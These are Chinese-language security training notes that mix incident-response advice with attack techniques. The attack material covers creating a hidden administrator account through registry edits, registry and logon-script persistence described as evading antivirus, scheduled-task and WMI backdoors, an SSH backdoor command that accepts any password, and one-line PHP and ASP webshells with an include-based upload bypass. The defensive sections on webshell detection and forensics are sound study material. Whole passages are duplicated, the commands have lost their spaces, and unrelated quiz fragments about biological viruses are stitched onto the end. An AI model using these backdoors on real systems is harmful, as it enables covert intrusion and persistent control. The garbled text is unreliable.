应急响应笔记黑客培训

信息探测->注入/xss点->获取数据->破解密码->登陆后台->上传webshell->提权控制服务器->渗透内网

webshell在攻击过程中的作用

文件操作,命令执行,数据库操作,用户提权,shell反弹,权限维持

攻击者通过漏洞,第三方组件,**w用msfvenom生成war包,只用指定-f后的参数为war就好了

影子账户:影子账户是指系统隐藏账户,在"控制面板-本地用户和组"里面看不见,但却有管理员权限的账户,

一般储存在注册表,影子账户的隐秘性十分之强

正常创建新用户的方式netuserpengpeng/add

创建影子用户的方式netuserpeng$peng/add

隐藏账户无法使用"netuser"命令查看,但是可以在"本地用户和组"可以查看

打开注册表"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names"找到刚刚创建的

peng$查看类型,查看administrator的类型,找到administrator的user目录和peng$的user目录,将

administrator下的F值的内容复制到peng$的F值下面,然后将这peng$的name值和对应的目录的内容导出,

然后使用netuserpeng$/del将peng$删除,再将两个注册表文件导入,影子用户2.0创建成功

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

下的键值为开机启动项,每一次开机都会执行键值对应的程序或bat脚本

LogonScripts是优先于很多杀毒软件启动的,所以可以通过这种方式达到一定的免杀效果.在注册表

**HKEY_CURRENT_USER\Environment这条路径下,添加新的字符串值,值的名字

为:UserInitMprLogonScript**,数值数据为想要启动程序的路径

Userinit的作用是在用户在进行登陆初始化设置时,会指定执行的程序,可以修改

**HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit**的键

at命令在Windows8之后不再支持

创建一个名为test的计划任务每天12:00执行test.bat脚本schtasks/create/tntest/scDAILY/st12:00/trC:\test.bat/Fat12:00/every:Monday.Tuesday,Wednesday,Thursday,FridayC:\test.bat

Bitsadmin后门:Bitsadmin后台智能传输服务,传输速度慢

拿到靶机的shell,输入指令**runmetsvc-A**会创建一个后门

wmicstatruplistfull\\自启动的程序

wmicprocesscallcreate"calc.exe"在当前机器中执行指定程序

Empire是一个后渗透框架,可以使用它来创建一个永久性的WMI事件订阅,从而在目标主机下留下持久化后门

使用Empire的wmi模块之前,需要使用Empire获得目标靶机的shell

alias

aliasll=ls-l

alias命令可以设置别名

将alias语句写入/etc/profile文件中

排查方法:输入alias就可以查看设置的别名

ssh后门设计TCP_WrappersPAM后门SSH后门

执行下main的命令可以使用任意密码ssh连接机器8888端口ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-OPort=8888

如果被植入了木马,找到木马运行文件的PID之后,进行kill,但是发现kill了之后有出现了一个新的木马,发现这个木马并不能够直接杀死.

使用TOP查看进程,如果发现有木马进程.这个时候首要的是使用chmod000[木马路径]先将木马的权限全部去掉,然后使用chattr+i命令,给木马程序加一个锁.执行完之后,下一步就是查找这个程序对本机做了什么操作.

首先查看**/etc/crontab文件,查询是否添加了什么语句.然后是查看/var/spool/at/spool**/和**/var/spool/cron两个文件夹是否存在恶意文件.再查询/etc/init.d/下有无奇怪的进程.接下来查看/etc/cron.查看这些目录下有无奇怪的文件。

最早查看netstat-anlpt发现有恶意流量的时候,首先应该开启防火墙将此流量加入黑名单,/etc/hosts.deny和/etc/hosts.allow这两个文件起到一个微隔离的作用,例如再/etc/hosts.deny文件中加入sshd:ALL就禁止所有ssh进行连接,配置完需要重启服务.还需要查看/etc/rc.d目录,还要查看rc0.d下一些文件是否又被篡改

查看/usr/bin目录,可以使用ls-thl给目录下的文件进行排序,还有一些命令的md5值被篡改.需要找到相同版

本的机器,将命令的md5值一个一个进行对比

如果是在业务期间:首先封锁住流量->确认感染的范围->抑制木马程序->再将木马程序进行查杀->安装第

可以查看*/etc/local/log/maillog文件,它会收到系统的邮件,记录root做了什么行为中了病毒,都得重装eb容器,拿到后台(各种姿势)等途径上传webshell

Webshell解析:phpechosystem($_GET[cmd]);>用get请求提交一个名为CMD的变量,然后变量中的字符受到前面system函数的调用,变成系统命令用来执行

Webshell是以web服务端脚本(程序)形式存在,与传统服务端脚本的运行原理相同.对服务器本地资源具备一定的操作能力,其操作本地资源的范围取决于解析器的权限

webshell没有连接时是无状态的,代码是可以连接数据库的

PHP一句话(webshell)代码简单容易暴露phpechosystem($_GET[cmd]);>请求方式:getasp一句话%evalrequest("asd")%>phpeval($_POST[cmd]);>eval执行数据$_POST提交方式cmd密码phpinclude'shell.jpg';>

包含并运行包含的文件

包含的文件shell.jsp(txt.png啥都行)

可以先上传一串以文本(txt)形式的php代码,然后再次上传一个包含include函数的php代码.当include函数

的php代码上传成功,访问include函数的php代码,include函数所包含的文件名是之前所上传的txt为后缀的

文件,但是内容却是为php的代码,会将txt文件的内容当作php代码来执行

webshell原理:文件操作,命令执行,其他功能

webshell的基本特征

本地资源的操作:读取软硬件信息,本地硬盘文件的读写操作,调用本地命令

无上下级链接:无外部链接可连接至webshell,webshell通常不链接到本地其他文件

传参数,认证登陆,cmd=ls

POST类型需要webshell管理工具webshell是由名字的webshell是会在日志中留下痕迹的webshell是有属性的webshell是一种脚本功能的展现(TEXT)

web扫描/爬虫/googlehack检测

基于web日志的检测基于文件属性的检测基于文件内容的检测通过文件名搜索webshell:统计webshell常用名字

部分webshell会将操作目标参数放在url参数中

日志若可记录referer字段,可对搜索referer字段为空的链接,因为绝大多数webshell无上下级链接,侵略者会

直接访问webshell文件

搜索思路:搜索文件名,搜索writeexec等参数,搜索referer字段为空的日志条目

对于使用post的webshell无法检测

文件可用属性:

文件最后修改日期:(方法同上,用于查找被插入到已有文件中的一句话木马)

文件的目录结构及md5值:(初始状态下设立安全基准值,安装状态下记录web目录结构并对目录中文件计

算,MD5值[可变文件和用户附件目录除外]定期进行匹配比对,并更新新的安全基准值)

特殊目录中的特殊类型文件

通过文件内容/类型检测webshell:

黑客常用关键词,常用命令执行,文件操作函数

基于文件属性的检测

特殊目录的特殊类型文件

用户可写入的目录

非用户可写入的文件类型

可通过文件头的方式进行排查以防止类似gif木马

针对webshell的各种特征码的小工具

NepPI,D盾,LinuxCheck,Webshellkiller,FastsumMD5值校验

Webshell查杀最佳实践:目录结构md5校验;特征码扫描;页面title页面关键字;流量人工识别(关键banner)

避免常规的漏洞:注入;后台泄露;前置缺陷;等等....

Webshell防范最强准则:可写的目录不可执行;可执行的目录不可写;权限用户tty;

恶意程序主要类型及危害病毒,蠕虫->造成系统缓慢,数据损坏,运行异常远控木马->主机被黑客远程连接僵尸网络程序(肉鸡行为)->主机对外发动DDOS攻击,对外发起扫描攻击行为挖矿程序->造成系统资源打量消耗

信息破坏事件系统配置篡改->系统中出现异常的服务,进程启动项,账号等等数据库内容篡改->业务数据遭到恶意篡改,引起业务异常和损失网站内容篡改->网站页面内容被何可恶意篡改数据信息泄露事件->服务器数据,会员账号遭到窃取并泄露

其他破坏事件账号被异常登陆->账号系统在异地登陆,可能出现账号密码的泄露异常网络连接->服务器发起对外的异常访问,连接到木马主控端,矿池,病毒服务器等行为

各种服务器Web日志存放位置%systemroot%\system32\logfiles\w3svc1\WindowsIIS其他服务器找到配置服务的配置文件检索/log/out通常:access.log,error.log,debug.log......

取证注意事项

工具携带;IP保存;验证留存;沟通;第三人;保护现场;取证工具:Ghost;WindowsPE;LinuxCD;日志分析:LogParser2.2;Grep日志切割:Split|cat|dd|head|tail|awk过程验证:Nc|curl|Wget|Sqlmap|Hackbar

处理过程

开始->过程->结果开始:日志提取;日志分析;过程:关联分析(头脑风暴);数据支持;结果:回溯攻击;查找本源;

进程排查思路

查找用户最近使用文件或者目录

影子账户:影子账户是指系统隐藏账户,在"控制面板-本地用户和组"里面看不见,但却有管理员权限的账户,一般储存在注册表,影子账户的隐秘性十分之强正常创建新用户的方式netuserpengpeng/add创建影子用户的方式netuserpeng$peng/add隐藏账户无法使用"netuser"命令查看,但是可以在"本地用户和组"可以查看打开注册表"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names"找到刚刚创建的peng$查看类型,查看administrator的类型,找到administrator的user目录和peng$的user目录,将administrator下的F值的内容复制到peng$的F值下面,然后将这peng$的name值和对应的目录的内容导出,然后使用netuserpeng$/del将peng$删除,再将两个注册表文件导入,影子用户2.0创建成功

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的键值为开机启动项,每一次开机都会执行键值对应的程序或bat脚本

LogonScripts是优先于很多杀毒软件启动的,所以可以通过这种方式达到一定的免杀效果.在注册表**HKEY_CURRENT_USER\Environment这条路径下,添加新的字符串值,值的名字为:UserInitMprLogonScript**,数值数据为想要启动程序的路径

查看/usr/bin目录,可以使用ls-thl给目录下的文件进行排序,还有一些命令的md5值被篡改.需要找到相同版本的机器,将命令的md5值一个一个进行对比如果是在业务期间:首先封锁住流量->确认感染的范围->抑制木马程序->再将木马程序进行查杀->安装第三方工具在机器上运行(rkhunter)可以查看*/etc/local/log/maillog**文件,它会收到系统的邮件,记录root做了什么行为中了病毒,都得重装

蚁剑的小tip

记一次新型变种QakBot木马分析

社交软件巨头全部中招,木马FFdroider正在窃取你的账户信息

THE END
1.在目前的信息网络中,()病毒是最主要的病毒类型试题预览 在目前的信息网络中,()病毒是最主要的病毒类型 A、引导型 B、文件型 C、网络蠕虫 D、木马型 查看答案 上一题下一题https://kaoshi.chazidian.com/kaoshi/shiti-124785/
2.在目前的信息网络中,病毒是最主要的病毒类型。在目前的信息网络中,___病毒是最主要的病毒类型。A.引导型B.文件型C.网络蠕虫D.木马型https://www.netkao.com/shiti/0/1321y0s8cawspr.html
3.在目前的信息网络中,病毒是最主要的病毒类型。在目前的信息网络中,___病毒是最主要的病毒类型。 更新时间:2024-11-18 19:02:58 八字精批2025流年运势八字合婚八字起名 A、引导型 B、文件型 C、网络蠕虫 D、木马型 正确答案: C 答案解析: 暂无解析 八字精批八字合婚八字起名八字财运2024运势测终身运姓名详批结婚吉日 您...http://www.yunzuti.com/shiti-124613/
4.目前奥密克戎病毒的主要类型是什么专家文章一般情况下,奥密克戎病毒的主要类型是BA.5.2、BF.7、BQ.1、BQ.1.1、XBB.1.5。具体分析如下: 奥密克戎病毒是新型冠状病毒的变异毒株,有BA.5.2、BF.7、BQ.1、BQ.1.1、XBB.1.5五种类型。BA.5.2、BF.7是比较流行的。虽然感染同一毒株后体内会产生抗体,但每种毒株有几种类型,抗体难以拦截所有类型的毒株,少部...https://m.bohe.cn/article/mip/ia9ip97gkx3zrbq.html
5.常见呼吸道病毒感染及中医药治疗对流感的防治主要以抗病毒药物及特异性疫苗的研制与应用为主,但以达菲为代表的抗流感药物多存在治疗局限性、耐药性、不良反应等问题,疫苗也只是针对当前流行的病毒类型有防御作用,对发生变异的病毒无预防作用。目前,正式上市的抗流感药物大体分为两类:一类是以金刚烷胺和金刚乙胺为代表的离子通道阻断剂;一类是神经...http://www.360doc.com/content/17/1224/10/31929599_715811774.shtml
6.临床医学检验:临床病毒学知识学习(考试必看)考试题库8、单项选择题 乙型肝炎病毒感染的主要标志是() A.抗-HBe B.HBeAg C.HBsAg D.HBcAg E.抗-HBc 点击查看答案 9、单项选择题 下列组织中,易检出狂犬病毒的胞质内嗜酸性包涵体的是() A.血液 B.骨髓 C.淋巴结 D.大脑海马回 E.外周神经组织 点击查看答案 10、单项选择题 HCV的核酸类型是() A.单正链...http://www.91exam.org/exam/87-1073/1073016.html
7.临床输血学与检验习题集A.经血液传播是该病原体传播的主要途径之一,感染将导致临床后果(发病) B.病原体人群中感染率高 C.病原体献血者中的感染率高 D.检测该病原体的检测方法和试剂灵敏性高 E.检测该病原体的检测方法和试剂特异性高 4.巨细胞病毒(CMV)可以经输血传播,目前未进行血液常规检测的原因主要是 ...https://www.360doc.cn/document/79930059_1128292261.html
1.目前儿童中常见的腺病毒类型是什么目前儿童中常见的腺病毒类型主要是7型和3型,这两种病毒类型都可以引起呼吸道疾病、结膜炎、肺炎等疾病。此外,其他类型的腺病毒也可以感染儿童,但相对较少见。 腺病毒是一种无包膜的双链DNA病毒,可以感染呼吸道、胃肠道、泌尿系统等多个器官。腺病毒感染通常具有自限性,但在一些情况下,特别是对于免疫系统较弱的儿童...https://www.comdeep.com/qa/KoYr32pZ.html
2.目前在网络上流行的"熊猫烧香"病毒属于(1)类型的病毒,感染该病毒...目前在网络上流行的"熊猫烧香"病毒属于(1)类型的病毒,感染该病毒后的计算机不会出现(2)的情况。 空白(2)处应选择() A. 执行文件图标变成熊猫烧香 B. 用户信息被泄露 C. 系统运行变慢 D. 破坏计算机主板 题目标签:选择病毒计算机如何将EXCEL生成题库手机刷题 ...https://www.shuashuati.com/ti/8cd45ac4eb11429bbca968e8071892e0.html?fm=bdbds7ba851f10c6b571a528fa1eb31c4d94b
3.2024最全流感常用药物推荐(甲流症状+与普通感冒/新冠区别+买药...按其核蛋白和基质蛋白分为四个型别:甲型(A型)流感病毒(H1N1、H3N2亚型等)和乙型(B型)流感病毒每年可引起季节性流行、丙型(c型)流感病毒仅呈散发感染,丁型(D型)流感病毒主要感染猪、牛等且未发现人类感染。甲型流感病毒根据病毒表面的血凝素和神经氨酸酶的蛋白结构和基因特性,可分为多种亚型。目前,发现的HA和...https://www.extrabux.cn/chs/guide/7774385
4.计算机病毒的预防措施8篇(全文)计算机病毒的预防措施 第1篇 摘要:目前计算机病毒可以渗透到信息社会的各个领域,给计算机系统带来了巨大的破坏和潜在的威胁,也给我们带来很多不必要的麻烦,为了确保信息的安全与畅通,因此,研究计算机病毒的预防措施已迫在眉睫。 关键词:计算机 病毒 防范 https://www.99xueshu.com/w/filec0228vgi.html
5.卫生资格公共卫生学练习题(带答案)9. 引起婴幼儿急性胃肠炎的主要病原体是 A. 新肠道病毒 B. 志贺氏菌 C. Norwalk 病毒 D. 轮状病毒 E. 大肠埃希菌 10.脊髓灰质炎病毒最主要的感染类型是 A. 隐性感染 B. 急性感染 C. 慢性感染 D. 潜伏感染 E. 慢发感染 11.脊髓灰质炎病毒排出体外主要通过 ...https://www.oh100.com/kaoshi/weisheng/shiti/258630.html